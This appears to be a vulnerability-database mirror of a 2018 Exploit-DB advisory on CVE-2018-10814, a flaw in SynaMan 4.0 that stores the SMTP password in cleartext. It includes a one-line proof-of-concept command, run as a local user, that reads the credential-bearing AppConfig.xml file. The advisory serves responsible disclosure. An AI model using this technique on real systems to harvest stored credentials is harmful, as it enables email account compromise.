Lucene search
K

SynaMan 4.0 build 1488 - SMTP Credential Disclosure

🗓️ 12 Sep 2018 00:00:00Reported by bzyoType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 37 Views

SynaMan 4.0 build 1488 - Cleartext password SMTP settings, email account compromis

Related
Code
ReporterTitlePublishedViews
Family
0day.today
SynaMan 4.0 build 1488 - SMTP Credential Disclosure Vulnerability
16 Sep 201800:00
zdt
CNVD
Synametrics SynaMan Information Disclosure Vulnerability
18 Sep 201800:00
cnvd
CVE
CVE-2018-10814
14 Sep 201821:00
cve
Cvelist
CVE-2018-10814
14 Sep 201821:00
cvelist
EUVD
EUVD-2018-2883
7 Oct 202500:30
euvd
exploitpack
SynaMan 4.0 build 1488 - SMTP Credential Disclosure
12 Sep 201800:00
exploitpack
NVD
CVE-2018-10814
14 Sep 201821:29
nvd
Packet Storm
SynaMan 40 Build 1488 SMTP Credential Disclosure
11 Sep 201800:00
packetstorm
Prion
Default credentials
14 Sep 201821:29
prion
# Exploit Author: bzyo
# CVE: CVE-2018-10814
# Twitter: @bzyo_
# Exploit Title: SynaMan 4.0 - Cleartext password SMTP settings
# Date: 09-12-18
# Vulnerable Software: SynaMan 4.0 build 1488
# Vendor Homepage: http://web.synametrics.com/SynaMan.htm
# Version: 4.0 build 1488
# Software Link: http://web.synametrics.com/SynaManDownload.htm
# Tested On: Windows 7 x86
  
Description
-----------------------------------------------------------------
SynaMan 4.0 suffers from cleartext password storage for SMTP settings which would allow email account compromise

Prerequisites
-----------------------------------------------------------------
Access to a system running Synaman 4 using a low-privileged user account
 
Proof of Concept
-----------------------------------------------------------------
The password for the smtp email account is stored in plaintext in the AppConfig.xml configuration file.  This file can be viewed by any local user of the system.

C:\SynaMan\config>type AppConfig.xml
<?xml version="1.0" encoding="UTF-8"?>
<Configuration>
        <parameters>
                <parameter name="hasLoggedInOnce" type="4" value="true"></parameter>
                <parameter name="adminEmail" type="1" value="[email protected]"></parameter>
                <parameter name="smtpSecurity" type="1" value="None"></parameter>
				**truncated**
                <parameter name="smtpPassword" type="1" value="SuperSecret!"></parameter>
                <parameter name="ntServiceCommand" type="1" value="net start SynaMan"></parameter>
                <parameter name="mimicHtmlFiles" type="4" value="false"></parameter>
        </parameters>
</Configuration>


 
Timeline
---------------------------------------------------------------------
05-07-18: Vendor notified of vulnerabilities
05-08-18: Vendor responded and will fix 
07-25-18: Vendor fixed in new release
09-12-18: Submitted public disclosure

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation